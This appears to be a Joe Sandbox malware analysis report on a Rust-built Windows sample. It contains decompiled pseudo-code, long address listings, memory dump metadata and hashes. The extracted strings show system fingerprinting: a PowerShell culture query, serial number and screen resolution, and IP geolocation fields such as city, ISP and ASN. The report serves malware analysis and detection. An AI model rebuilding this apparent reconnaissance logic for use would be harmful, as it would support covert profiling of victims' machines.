				 *(_t663 + 0xd60) =  &M00007FF77FF768DC12AE;
				 *(_t663 + 0xd60) = 0x3b4f06ba;
				E00007FF77FF768B7BF02(_t369, 6,  *(_t663 + 0xd60),  *(_t663 + 0xd60));
				_t404 =  *0x176F8B173B4F06BC & 0x000000ff ^ 0x0000009c;
				_t248 = _t663 + 0x1d50; // -196936464789614024
				_t636 = _t248;
				 *(_t636 + 2) = _t404;
				 *_t636 =  *0x3b4f06ba & 0x0000ffff ^ 0x0000a403;
				 *((long long*)(_t663 + 0x2570)) = _t636;
				 *((long long*)(_t663 + 0x2578)) = 3;
				E00007FF77FF768C5897D("connectioncdn-cache-controlcache-statuscache-controlauthorizationalt-svcallowageaccess-control-request-methodaccess-control-request-headersaccess-control-max-ageaccess-control-expose-headersaccess-control-allow-originaccess-control-allow-methodsaccess-control-allow-headersaccess-control-allow-credentialsaccept-rangesaccept-languageaccept-encodingaccept-charsetacceptC:\\Users\\user\\.cargo\\registry\\src\\github.com-1ecc6299db9ec823\\http-0.2.9\\src\\header\\value.rs", _t636, _t661);
				_t520 =  ==  ? 0x68e2a988 : 0x3b4f06ba;
				E00007FF77FF768C5897D(0x68dc5700, _t636, _t520);
				_t521 =  ==  ? 0x68e2a988 : _t520;
				if ( *_t521 != 3) goto 0x68bac32e;
				_t587 =  *((intOrPtr*)(_t521 + 0x10));
				if (_t587 == 0) goto 0x68bac32e;
				_t522 =  *((intOrPtr*)(_t521 + 0x18));
				 *((long long*)(_t663 + 0x1e60)) = _t587;
				 *((long long*)(_t663 + 0x1e68)) = _t522;
				E00007FF77FF768C5897D("connectioncdn-cache-controlcache-statuscache-controlauthorizationalt-svcallowageaccess-control-request-methodaccess-control-request-headersaccess-control-max-ageaccess-control-expose-headersaccess-control-allow-originaccess-control-allow-methodsaccess-control-allow-headersaccess-control-allow-credentialsaccept-rangesaccept-languageaccept-encodingaccept-charsetacceptC:\\Users\\user\\.cargo\\registry\\src\\github.com-1ecc6299db9ec823\\http-0.2.9\\src\\header\\value.rs", _t636, _t661);
				_t523 =  ==  ? 0x68e2a988 : _t522;
				E00007FF77FF768C5897D(0x68dc5720, _t636, _t523);
				_t524 =  ==  ? 0x68e2a988 : _t523;
				if ( *_t524 != 2) goto 0x68bac1d1;
				if ( *((intOrPtr*)(_t524 + 8)) == 0) goto 0x68b9f4c2;
				if (_t404 != 1) goto 0x68bac1d1;
				goto 0x68b9f4cf;
				_t526 =  *((intOrPtr*)( *((intOrPtr*)(_t524 + 0x10)) + 0x10));
				if (_t526 < 0) goto 0x68bac1d1;
				 *(_t663 + 0x2110) = _t526;
				_t260 = _t663 + 0x2570; // -196936464789611944
				 *((long long*)(_t663 + 0x10)) = _t260;
				 *((long long*)(_t663 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t663 + 0x20)) = _t690;
				 *((long long*)(_t663 + 0x28)) = 0x68befcb0;
				_t265 = _t663 + 0x2110; // -196936464789613064
				 *((long long*)(_t663 + 0x30)) = _t265;
				 *((long long*)(_t663 + 0x38)) = E00007FF77FF768BC2E10;
				_t268 = _t663 + 0xd60; // -196936464789618104
				_t656 = _t268;
				 *_t656 = 0;
				 *((long long*)(_t656 + 0x10)) = 0x68dc56d0;
				 *((long long*)(_t656 + 0x18)) = 0x68dc56d0;
				 *((long long*)(_t656 + 0x20)) = _t683;
				 *((long long*)(_t656 + 0x28)) = 0x68dc56d0;
				_t273 = _t663 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t273, _t656);
				if ( *(_t661 + 0x68) !=  *((intOrPtr*)(_t661 + 0x58))) goto 0x68b9f559;
				E00007FF77FF768C51B93( *(_t661 + 0x68) -  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t663 + 0x2770)),  *(_t661 + 0x68), _t523);
				 *((long long*)( *((intOrPtr*)(_t661 + 0x60)) + 0x10 + ( *(_t661 + 0x68) +  *(_t661 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t663 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t661 + 0x68) =  *(_t661 + 0x68) + 1;
				 *(_t663 + 0xd60) = 0x68dbef95;
				 *(_t663 + 0xd60) = 0x40291583;
				0x68b7c721();
				 *(_t663 + 0x2110) = 0x0bb9d9bc ^  *0x40291583;
				_t291 = _t663 + 0x2110; // -196936464789613064
				_t535 = _t291;
				 *((long long*)(_t663 + 0x2570)) = _t535;
				 *((long long*)(_t663 + 0x2578)) = 8;
				E00007FF77FF768C5897D("timezoneutc",  *(_t663 + 0xd60), _t661);
				_t536 =  ==  ? 0x68e2a988 : _t535;
				E00007FF77FF768C5897D(0x68dc5748,  *(_t663 + 0xd60), _t536);
				_t537 =  ==  ? 0x68e2a988 : _t536;
				if ( *_t537 != 3) goto 0x68bac341;
				_t599 =  *((intOrPtr*)(_t537 + 0x10));
				if (_t599 == 0) goto 0x68bac341;
				 *((long long*)(_t663 + 0x1e60)) = _t599;
				 *((long long*)(_t663 + 0x1e68)) =  *((intOrPtr*)(_t537 + 0x18));
				_t298 = _t663 + 0x2570; // -196936464789611944
				 *((long long*)(_t663 + 0x10)) = _t298;
				 *((long long*)(_t663 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t663 + 0x20)) = _t690;
				 *((long long*)(_t663 + 0x28)) = 0x68befcb0;
				_t303 = _t663 + 0xd60; // -196936464789618104
				_t662 = _t303;
				 *_t662 = 0;
				 *((long long*)(_t662 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t662 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t662 + 0x20)) = _t683;
				 *((long long*)(_t662 + 0x28)) = 0x68e2d3e8;
				_t308 = _t663 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t308, _t662);
				_t693 =  *((intOrPtr*)(_t663 + 0x2778));
				if ( *(_t693 + 0x68) !=  *((intOrPtr*)(_t693 + 0x58))) goto 0x68b9f6b1;
				_t384 = E00007FF77FF768C51B93( *(_t693 + 0x68) -  *((intOrPtr*)(_t693 + 0x58)),  *((intOrPtr*)(_t663 + 0x2770)),  *(_t693 + 0x68), _t536);
				 *((long long*)( *((intOrPtr*)(_t693 + 0x60)) + 0x10 + ( *(_t693 + 0x68) +  *(_t693 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t663 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t693 + 0x68) =  *(_t693 + 0x68) + 1;
				 *(_t663 + 0xd60) = 0x68dbd6a0;
				 *(_t663 + 0xd60) = 0x11e5e200;
				E00007FF77FF768B7BF47(_t384, 3,  *(_t663 + 0xd60),  *(_t663 + 0xd60));
			}


























































                                                                                          0x7ff768b9eae5
                                                                                          0x7ff768b9eaeb
                                                                                          0x7ff768b9eaf2
                                                                                          0x7ff768b9eaf9
                                                                                          0x7ff768b9eb00
                                                                                          0x7ff768b9eb07
                                                                                          0x7ff768b9eb0e
                                                                                          0x7ff768b9eb11
                                                                                          0x7ff768b9eb18
                                                                                          0x7ff768b9eb1c
                                                                                          0x7ff768b9eb1f
                                                                                          0x7ff768b9eb23
                                                                                          0x7ff768b9eb2b
                                                                                          0x7ff768b9eb33
                                                                                          0x7ff768b9eb37
                                                                                          0x7ff768b9eb41
                                                                                          0x7ff768b9eb49
                                                                                          0x7ff768b9eb5a
                                                                                          0x7ff768b9eb70
                                                                                          0x7ff768b9eb76
                                                                                          0x7ff768b9eb87
                                                                                          0x7ff768b9eb8d
                                                                                          0x7ff768b9eb93
                                                                                          0x7ff768b9eb9a
                                                                                          0x7ff768b9eba1
                                                                                          0x7ff768b9eba7
                                                                                          0x7ff768b9ebac
                                                                                          0x7ff768b9ebb3
                                                                                          0x7ff768b9ebbb
                                                                                          0x7ff768b9ebc3
                                                                                          0x7ff768b9ebca
                                                                                          0x7ff768b9ebd1
                                                                                          0x7ff768b9ebdb
                                                                                          0x7ff768b9ebe4
                                                                                          0x7ff768b9ebe7
                                                                                          0x7ff768b9ebf9
                                                                                          0x7ff768b9ebfd
                                                                                          0x7ff768b9ec03
                                                                                          0x7ff768b9ec07
                                                                                          0x7ff768b9ec0d
                                                                                          0x7ff768b9ec22
                                                                                          0x7ff768b9ec30
                                                                                          0x7ff768b9ec3c
                                                                                          0x7ff768b9ec49
                                                                                          0x7ff768b9ec50
                                                                                          0x7ff768b9ec5f
                                                                                          0x7ff768b9ec71
                                                                                          0x7ff768b9ec7a
                                                                                          0x7ff768b9ec86
                                                                                          0x7ff768b9ec8e
                                                                                          0x7ff768b9ec97
                                                                                          0x7ff768b9eca4
                                                                                          0x7ff768b9ecac
                                                                                          0x7ff768b9ecb2
                                                                                          0x7ff768b9ecb5
                                                                                          0x7ff768b9ecbf
                                                                                          0x7ff768b9ecc3
                                                                                          0x7ff768b9ecca
                                                                                          0x7ff768b9ecd2
                                                                                          0x7ff768b9ece0
                                                                                          0x7ff768b9ece6
                                                                                          0x7ff768b9ecec
                                                                                          0x7ff768b9ecf3
                                                                                          0x7ff768b9ed0b
                                                                                          0x7ff768b9ed1b
                                                                                          0x7ff768b9ed21
                                                                                          0x7ff768b9ed27
                                                                                          0x7ff768b9ed2e
                                                                                          0x7ff768b9ed35
                                                                                          0x7ff768b9ed3f
                                                                                          0x7ff768b9ed51
                                                                                          0x7ff768b9ed57
                                                                                          0x7ff768b9ed5d
                                                                                          0x7ff768b9ed64
                                                                                          0x7ff768b9ed6f
                                                                                          0x7ff768b9ed77
                                                                                          0x7ff768b9ed7d
                                                                                          0x7ff768b9ed84
                                                                                          0x7ff768b9ed92
                                                                                          0x7ff768b9ed95
                                                                                          0x7ff768b9ed98
                                                                                          0x7ff768b9ed9c
                                                                                          0x7ff768b9eda0
                                                                                          0x7ff768b9eda6
                                                                                          0x7ff768b9edaa
                                                                                          0x7ff768b9edb2
                                                                                          0x7ff768b9edbd
                                                                                          0x7ff768b9edc1
                                                                                          0x7ff768b9edca
                                                                                          0x7ff768b9edd3
                                                                                          0x7ff768b9ede1
                                                                                          0x7ff768b9ede8
                                                                                          0x7ff768b9edec
                                                                                          0x7ff768b9edf7
                                                                                          0x7ff768b9ee0f
                                                                                          0x7ff768b9ee16
                                                                                          0x7ff768b9ee1d
                                                                                          0x7ff768b9ee3b
                                                                                          0x7ff768b9ee40
                                                                                          0x7ff768b9ee47
                                                                                          0x7ff768b9ee50
                                                                                          0x7ff768b9ee5e
                                                                                          0x7ff768b9ee61
                                                                                          0x7ff768b9ee64
                                                                                          0x7ff768b9ee69
                                                                                          0x7ff768b9ee75
                                                                                          0x7ff768b9ee7c
                                                                                          0x7ff768b9ee7e
                                                                                          0x7ff768b9ee87
                                                                                          0x7ff768b9ee8b
                                                                                          0x7ff768b9ee8f
                                                                                          0x7ff768b9ee93
                                                                                          0x7ff768b9ee98
                                                                                          0x7ff768b9eea1
                                                                                          0x7ff768b9eeac
                                                                                          0x7ff768b9eecb
                                                                                          0x7ff768b9eed9
                                                                                          0x7ff768b9eee6
                                                                                          0x7ff768b9eee6
                                                                                          0x7ff768b9eeed
                                                                                          0x7ff768b9eef0
                                                                                          0x7ff768b9eef7
                                                                                          0x7ff768b9ef11
                                                                                          0x7ff768b9ef20
                                                                                          0x7ff768b9ef27
                                                                                          0x7ff768b9ef2d
                                                                                          0x7ff768b9ef34
                                                                                          0x7ff768b9ef3e
                                                                                          0x7ff768b9ef3e
                                                                                          0x7ff768b9ef45
                                                                                          0x7ff768b9ef48
                                                                                          0x7ff768b9ef4c
                                                                                          0x7ff768b9ef53
                                                                                          0x7ff768b9ef5e
                                                                                          0x7ff768b9ef62
                                                                                          0x7ff768b9ef66
                                                                                          0x7ff768b9ef6a
                                                                                          0x7ff768b9ef6a
                                                                                          0x7ff768b9ef71
                                                                                          0x7ff768b9ef7f
                                                                                          0x7ff768b9ef88
                                                                                          0x7ff768b9ef8c
                                                                                          0x7ff768b9ef8c
                                                                                          0x7ff768b9ef90
                                                                                          0x7ff768b9ef94
                                                                                          0x7ff768b9ef98
                                                                                          0x7ff768b9efa2
                                                                                          0x7ff768b9efb6
                                                                                          0x7ff768b9efbb
                                                                                          0x7ff768b9efd3
                                                                                          0x7ff768b9efd8
                                                                                          0x7ff768b9efdf
                                                                                          0x7ff768b9efe3
                                                                                          0x7ff768b9efee
                                                                                          0x7ff768b9f006
                                                                                          0x7ff768b9f014
                                                                                          0x7ff768b9f02e
                                                                                          0x7ff768b9f047
                                                                                          0x7ff768b9f051
                                                                                          0x7ff768b9f058
                                                                                          0x7ff768b9f058
                                                                                          0x7ff768b9f05f
                                                                                          0x7ff768b9f066
                                                                                          0x7ff768b9f080
                                                                                          0x7ff768b9f088
                                                                                          0x7ff768b9f08f
                                                                                          0x7ff768b9f095
                                                                                          0x7ff768b9f09c
                                                                                          0x7ff768b9f0a6
                                                                                          0x7ff768b9f0ad
                                                                                          0x7ff768b9f0b4
                                                                                          0x7ff768b9f0bb
                                                                                          0x7ff768b9f0c6
                                                                                          0x7ff768b9f0ca
                                                                                          0x7ff768b9f0ce
                                                                                          0x7ff768b9f0d2
                                                                                          0x7ff768b9f0d2
                                                                                          0x7ff768b9f0d9
                                                                                          0x7ff768b9f0e7
                                                                                          0x7ff768b9f0f0
                                                                                          0x7ff768b9f0f4
                                                                                          0x7ff768b9f0f8
                                                                                          0x7ff768b9f0fc
                                                                                          0x7ff768b9f106
                                                                                          0x7ff768b9f113
                                                                                          0x7ff768b9f118
                                                                                          0x7ff768b9f130
                                                                                          0x7ff768b9f135
                                                                                          0x7ff768b9f13c
                                                                                          0x7ff768b9f140
                                                                                          0x7ff768b9f14b
                                                                                          0x7ff768b9f163
                                                                                          0x7ff768b9f171
                                                                                          0x7ff768b9f17d
                                                                                          0x7ff768b9f183
                                                                                          0x7ff768b9f183
                                                                                          0x7ff768b9f18a
                                                                                          0x7ff768b9f191
                                                                                          0x7ff768b9f1ab
                                                                                          0x7ff768b9f1b3
                                                                                          0x7ff768b9f1ba
                                                                                          0x7ff768b9f1c0
                                                                                          0x7ff768b9f1c7
                                                                                          0x7ff768b9f1d1
                                                                                          0x7ff768b9f1d8
                                                                                          0x7ff768b9f1df
                                                                                          0x7ff768b9f1e6
                                                                                          0x7ff768b9f1f1
                                                                                          0x7ff768b9f1f5
                                                                                          0x7ff768b9f1f9
                                                                                          0x7ff768b9f1fd
                                                                                          0x7ff768b9f1fd
                                                                                          0x7ff768b9f204
                                                                                          0x7ff768b9f212
                                                                                          0x7ff768b9f21b
                                                                                          0x7ff768b9f21f
                                                                                          0x7ff768b9f223
                                                                                          0x7ff768b9f227
                                                                                          0x7ff768b9f231
                                                                                          0x7ff768b9f23e
                                                                                          0x7ff768b9f243
                                                                                          0x7ff768b9f25b
                                                                                          0x7ff768b9f260
                                                                                          0x7ff768b9f267
                                                                                          0x7ff768b9f26b
                                                                                          0x7ff768b9f276
                                                                                          0x7ff768b9f28e
                                                                                          0x7ff768b9f29c
                                                                                          0x7ff768b9f2b4
                                                                                          0x7ff768b9f2ba
                                                                                          0x7ff768b9f2c1
                                                                                          0x7ff768b9f2c1
                                                                                          0x7ff768b9f2c8
                                                                                          0x7ff768b9f2cf
                                                                                          0x7ff768b9f2e9
                                                                                          0x7ff768b9f2f1
                                                                                          0x7ff768b9f2f8
                                                                                          0x7ff768b9f2fe
                                                                                          0x7ff768b9f305
                                                                                          0x7ff768b9f30f
                                                                                          0x7ff768b9f316
                                                                                          0x7ff768b9f31d
                                                                                          0x7ff768b9f324
                                                                                          0x7ff768b9f32f
                                                                                          0x7ff768b9f333
                                                                                          0x7ff768b9f337
                                                                                          0x7ff768b9f33b
                                                                                          0x7ff768b9f33b
                                                                                          0x7ff768b9f342
                                                                                          0x7ff768b9f350
                                                                                          0x7ff768b9f359
                                                                                          0x7ff768b9f35d
                                                                                          0x7ff768b9f361
                                                                                          0x7ff768b9f365
                                                                                          0x7ff768b9f36f
                                                                                          0x7ff768b9f37c
                                                                                          0x7ff768b9f381
                                                                                          0x7ff768b9f399
                                                                                          0x7ff768b9f39e
                                                                                          0x7ff768b9f3a5
                                                                                          0x7ff768b9f3a9
                                                                                          0x7ff768b9f3b4
                                                                                          0x7ff768b9f3cc
                                                                                          0x7ff768b9f3da
                                                                                          0x7ff768b9f3eb
                                                                                          0x7ff768b9f3ee
                                                                                          0x7ff768b9f3ee
                                                                                          0x7ff768b9f3f5
                                                                                          0x7ff768b9f3f8
                                                                                          0x7ff768b9f3fb
                                                                                          0x7ff768b9f402
                                                                                          0x7ff768b9f41c
                                                                                          0x7ff768b9f424
                                                                                          0x7ff768b9f437
                                                                                          0x7ff768b9f43f
                                                                                          0x7ff768b9f446
                                                                                          0x7ff768b9f44c
                                                                                          0x7ff768b9f453
                                                                                          0x7ff768b9f459
                                                                                          0x7ff768b9f45d
                                                                                          0x7ff768b9f464
                                                                                          0x7ff768b9f47a
                                                                                          0x7ff768b9f482
                                                                                          0x7ff768b9f495
                                                                                          0x7ff768b9f49d
                                                                                          0x7ff768b9f4a4
                                                                                          0x7ff768b9f4b1
                                                                                          0x7ff768b9f4b6
                                                                                          0x7ff768b9f4c0
                                                                                          0x7ff768b9f4c2
                                                                                          0x7ff768b9f4c9
                                                                                          0x7ff768b9f4cf
                                                                                          0x7ff768b9f4d6
                                                                                          0x7ff768b9f4dd
                                                                                          0x7ff768b9f4e8
                                                                                          0x7ff768b9f4ec
                                                                                          0x7ff768b9f4f0
                                                                                          0x7ff768b9f4f4
                                                                                          0x7ff768b9f4fb
                                                                                          0x7ff768b9f506
                                                                                          0x7ff768b9f50a
                                                                                          0x7ff768b9f50a
                                                                                          0x7ff768b9f511
                                                                                          0x7ff768b9f51f
                                                                                          0x7ff768b9f528
                                                                                          0x7ff768b9f52c
                                                                                          0x7ff768b9f530
                                                                                          0x7ff768b9f534
                                                                                          0x7ff768b9f53e
                                                                                          0x7ff768b9f54b
                                                                                          0x7ff768b9f550
                                                                                          0x7ff768b9f568
                                                                                          0x7ff768b9f56d
                                                                                          0x7ff768b9f574
                                                                                          0x7ff768b9f578
                                                                                          0x7ff768b9f583
                                                                                          0x7ff768b9f59b
                                                                                          0x7ff768b9f5a9
                                                                                          0x7ff768b9f5bb
                                                                                          0x7ff768b9f5c2
                                                                                          0x7ff768b9f5c2
                                                                                          0x7ff768b9f5c9
                                                                                          0x7ff768b9f5d0
                                                                                          0x7ff768b9f5ea
                                                                                          0x7ff768b9f5f2
                                                                                          0x7ff768b9f605
                                                                                          0x7ff768b9f60d
                                                                                          0x7ff768b9f614
                                                                                          0x7ff768b9f61a
                                                                                          0x7ff768b9f621
                                                                                          0x7ff768b9f62b
                                                                                          0x7ff768b9f632
                                                                                          0x7ff768b9f639
                                                                                          0x7ff768b9f640
                                                                                          0x7ff768b9f64b
                                                                                          0x7ff768b9f64f
                                                                                          0x7ff768b9f653
                                                                                          0x7ff768b9f657
                                                                                          0x7ff768b9f657
                                                                                          0x7ff768b9f65e
                                                                                          0x7ff768b9f66c
                                                                                          0x7ff768b9f675
                                                                                          0x7ff768b9f679
                                                                                          0x7ff768b9f67d
                                                                                          0x7ff768b9f681
                                                                                          0x7ff768b9f68b
                                                                                          0x7ff768b9f690
                                                                                          0x7ff768b9f69f
                                                                                          0x7ff768b9f6a8
                                                                                          0x7ff768b9f6c0
                                                                                          0x7ff768b9f6c5
                                                                                          0x7ff768b9f6cc
                                                                                          0x7ff768b9f6d0
                                                                                          0x7ff768b9f6db
                                                                                          0x7ff768b9f6f3
                                                                                          0x7ff768b9f701

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Free$Heap$CloseHandle$memcpy$ErrorLastObjectSingleStringWaitmemcmp
                                                                                          • String ID: CurrentHorizontalResolutionCurrentVerticalResolution$Name$Name$SerialNu$SerialNumber-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$\\?\library\std\src\sys\windows\path.rs$asn$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$city$connectioncdn-cache-controlcache-statuscache-controlauthorizationalt-svcallowageaccess-control-request-methodaccess-control-request-headersaccess-control-max-ageaccess-control-expose-headersaccess-control-allow-originaccess-control-allow-methodsaccess-control-$country$hell.exe$isp$nown$nown$postal$powershe$riting$timezoneutc
                                                                                          • API String ID: 2215880662-3108908181
                                                                                          • Opcode ID: 1402fb41461e07482d65397c1e0a888fc85aa5b9b19169112f96c0d04b872d8c
                                                                                          • Instruction ID: dbd2709a95d96f9ab924447a0cf9e939fa1bfff8fd7b9fbaaa08165c1513c5a2
                                                                                          • Opcode Fuzzy Hash: 1402fb41461e07482d65397c1e0a888fc85aa5b9b19169112f96c0d04b872d8c
                                                                                          • Instruction Fuzzy Hash: A9436A72A08BC1C9EB319F25D8543E9B3A4FB58788F804236DA8D4BB58EF38D655C354
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B9E54E Relevance: 68.2, APIs: 19, Strings: 18, Instructions: 3454COMMONCrypto
                                                                                          Download Yara Rule
                                                                                          C-Code - Quality: 57%
                                                                                          			E00007FF77FF768B9E54E(void* __edi, void* __esi, void* __esp, long long __rax, void* __r9, void* __r15) {
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				void* _t442;
				void* _t456;
				void* _t459;
				void* _t466;
				void* _t473;
				void* _t484;
				void* _t499;
				signed char _t540;
				void* _t541;
				void* _t567;
				void* _t569;
				void* _t580;
				void* _t581;
				void* _t599;
				void* _t600;
				void* _t607;
				void* _t651;
				long long _t656;
				signed long long _t657;
				signed long long _t658;
				intOrPtr _t663;
				char* _t666;
				long long _t677;
				char* _t678;
				long long _t686;
				char* _t687;
				long long _t695;
				char* _t696;
				void* _t704;
				char* _t705;
				long long _t706;
				void* _t707;
				char* _t708;
				signed long long _t710;
				long long _t719;
				void* _t720;
				char* _t721;
				void* _t731;
				long long _t746;
				intOrPtr _t764;
				long long _t765;
				signed long long _t773;
				long long _t775;
				intOrPtr _t777;
				long long _t783;
				long long _t789;
				long long _t795;
				long long _t802;
				long long _t814;
				long long _t819;
				long long _t820;
				long long* _t831;
				signed long long* _t835;
				long long _t863;
				intOrPtr _t884;
				void* _t888;
				long long* _t889;
				long long* _t890;
				long long* _t891;
				long long* _t892;
				long long* _t893;
				char* _t905;
				signed long long _t908;
				char* _t909;
				long long* _t910;
				void* _t911;
				char* _t932;
				long long _t934;
				long long _t938;
				long long _t941;
				long long _t942;
				char* _t950;
				long long _t951;
				intOrPtr _t954;
				intOrPtr _t959;

				_t931 = __r9;
				_t580 = __esi;
				_t932 = __r15 + 0x220;
				_t418 =  *(__r15 + 0x220) & 0x000000ff;
				 *((long long*)(_t911 + 0x2780)) = __r15 + 0xc0;
				if (_t418 == 0) goto 0x68b9e62a;
				if (_t418 == 3) goto 0x68b9e7e1;
				goto 0x68bac568;
				_t419 =  *(__r15 + 0x4f0) & 0x000000ff;
				 *((long long*)(_t911 + 0x2780)) = __r15 + 0x4f0;
				if (_t419 == 0) goto 0x68baaa6b;
				if (_t419 != 3) goto 0x68bac246;
				_t819 = __r15 + 0x450;
				_t420 =  *(__r15 + 0x450) & 0x000000ff;
				 *((long long*)(_t911 + 0x2770)) = _t819;
				if (_t420 == 0) goto 0x68baaac9;
				if (_t420 != 3) goto 0x68bac55a;
				 *((long long*)(_t911 + 0x2740)) = __r15 + 0xc0;
				goto 0x68baae3b;
				_t421 =  *(__r15 + 0x340) & 0x000000ff;
				if (_t421 == 0) goto 0x68b9ea32;
				if (_t421 == 3) goto 0x68b9ea80;
				goto 0x68bac568;
				E00007FF77FF768C46F84(_t541, __edi, __esi, __esp, _t421 - 3, __rax, _t911 + 0x22a0, _t819, 0x68dc1c28, __r9);
				E00007FF77FF768C40BE4(); // executed
				 *((long long*)(__r15 + 0xc0)) = __rax;
				 *((long long*)(__r15 + 0xc8)) = _t819;
				if (__rax == 0) goto 0x68b9e670;
				r13d = 3;
				goto 0x68b9e87f;
				 *((long long*)(__r15 + 0xe0)) = _t819;
				_t731 = _t911 + 0x22a0;
				_t820 =  *((intOrPtr*)(__r15 + 0xd0));
				E00007FF77FF768C44D8F(__rax, _t731, _t820,  *((intOrPtr*)(__r15 + 0xd8)));
				_t599 =  *((intOrPtr*)(_t731 + 0x18)) - 2;
				if (_t599 != 0) goto 0x68b9e6a0;
				_t746 =  *((intOrPtr*)(_t911 + 0x22a0));
				goto 0x68b9e6d9;
				asm("xorps xmm0, xmm0");
				asm("movaps [ebp-0x20], xmm0");
				memcpy(__edi, __esi, 0xb);
				asm("movaps [ebp+0x2510], xmm0");
				asm("movaps [ebp+0x20e0], xmm0");
				asm("movaps [ebp+0x2290], xmm0");
				asm("lock dec ecx");
				if (_t599 <= 0) goto 0x68babf7e;
				_t651 = _t911 + 0x2328;
				 *((long long*)(_t651 - 0x88)) = _t746;
				asm("movaps xmm0, [ebp+0x2510]");
				asm("movups [eax-0x80], xmm0");
				 *((long long*)(_t651 - 0x70)) = _t746;
				asm("movaps xmm0, [ebp+0x20e0]");
				asm("movups [eax-0x68], xmm0");
				 *((long long*)(_t651 - 0x58)) = _t746;
				asm("movaps xmm0, [ebp+0x2290]");
				asm("movups [eax-0x50], xmm0");
				asm("movups xmm0, [ebp+0x1cf0]");
				asm("movups [eax-0x40], xmm0");
				 *((short*)(_t651 - 0x30)) = 0;
				 *((long long*)(_t651 - 0x2e)) =  *((intOrPtr*)(_t911 + 2));
				 *((long long*)(_t651 - 0x28)) =  *((intOrPtr*)(_t911 + 8));
				 *((intOrPtr*)(_t651 - 0x20)) = 0x3b9aca00;
				 *((char*)(_t651 - 0x18)) = 1;
				 *((intOrPtr*)(_t651 - 0x14)) = 0;
				 *((intOrPtr*)(_t651 - 0x17)) = 0;
				asm("movaps xmm0, [ebp-0x20]");
				asm("movups [eax-0x10], xmm0");
				memcpy(__esi + 0x16, __esi, 0xb);
				_t567 = __esi + 0x16;
				 *((long long*)(_t651 + 0x58)) = _t820;
				asm("movups xmm0, [ebp+0x2700]");
				asm("movdqu xmm1, [ebp+0x2710]");
				asm("movups [eax+0x60], xmm0");
				asm("movdqu [eax+0x70], xmm1");
				 *((char*)(_t651 + 0x80)) = 2;
				E00007FF77FF768C471E4(0, _t567, _t581, _t911 + 0x2570, _t819, _t911 + 0x22a0);
				E00007FF77FF768C47A98(_t567, __esi, __esp + 0x18, _t911 + 0x1e60, _t911 + 0x2570); // executed
				r8d = 0x138;
				memcpy(??, ??, ??);
				E00007FF77FF768C363F0(); // executed
				_t941 =  *((intOrPtr*)(_t911 + 0x2300));
				_t600 = _t941 - 4;
				if (_t600 != 0) goto 0x68b9e816;
				 *_t932 = 3;
				sil = 1;
				goto 0x68babc12;
				memcpy(_t567, __esi, 0xb);
				_t569 = __esi + 0x16;
				asm("movups xmm0, [eax+0x60]");
				asm("movups xmm1, [eax+0x70]");
				asm("movups xmm2, [eax+0x80]");
				asm("movaps [ebp+0x26b0], xmm2");
				asm("movaps [ebp+0x26a0], xmm1");
				asm("movaps [ebp+0x2690], xmm0");
				E00007FF77FF768B78D9C( *((intOrPtr*)(_t911 + 0x2778)) + 0xe8);
				asm("lock dec eax");
				if (_t600 != 0) goto 0x68b9e87f;
				E00007FF77FF768C36322();
				memcpy(_t569, _t580, 0xb);
				asm("movaps xmm0, [ebp+0x2690]");
				asm("movaps xmm1, [ebp+0x26a0]");
				asm("movaps xmm2, [ebp+0x26b0]");
				asm("movaps [ebp+0x1d20], xmm2");
				asm("movaps [ebp+0x1d10], xmm1");
				asm("movaps [ebp+0x1d00], xmm0");
				 *_t932 = 1;
				memcpy(_t580 + 0x16, _t580, 0xb);
				asm("movaps xmm0, [ebp+0x1d00]");
				asm("movaps xmm1, [ebp+0x1d10]");
				asm("movdqa xmm2, [ebp+0x1d20]");
				asm("movdqa [ebp+0x1cc0], xmm2");
				asm("movaps [ebp+0x1cb0], xmm1");
				asm("movaps [ebp+0x1ca0], xmm0");
				0x68b7989a();
				if (r13d == 3) goto 0x68bac1f7;
				memcpy(_t580 + 0x16, _t580, 0xb);
				asm("movaps xmm0, [ebp+0x1ca0]");
				asm("movaps xmm1, [ebp+0x1cb0]");
				asm("movaps xmm2, [ebp+0x1cc0]");
				asm("movaps [ebp+0x2550], xmm2");
				asm("movaps [ebp+0x2540], xmm1");
				asm("movaps [ebp+0x2530], xmm0");
				r8d = 0x1e8;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t911 + 0x2100)) =  *((intOrPtr*)(_t911 + 0x1c69));
				 *((intOrPtr*)(_t911 + 0x2103)) =  *((intOrPtr*)(_t911 + 0x1c6c));
				r8d = 0x1e8;
				memcpy(??, ??, ??);
				_t954 =  *((intOrPtr*)(_t911 + 0x2778));
				 *((long long*)(_t954 + 0x2a8)) =  *((intOrPtr*)(_t911 + 0x22a8 - 8));
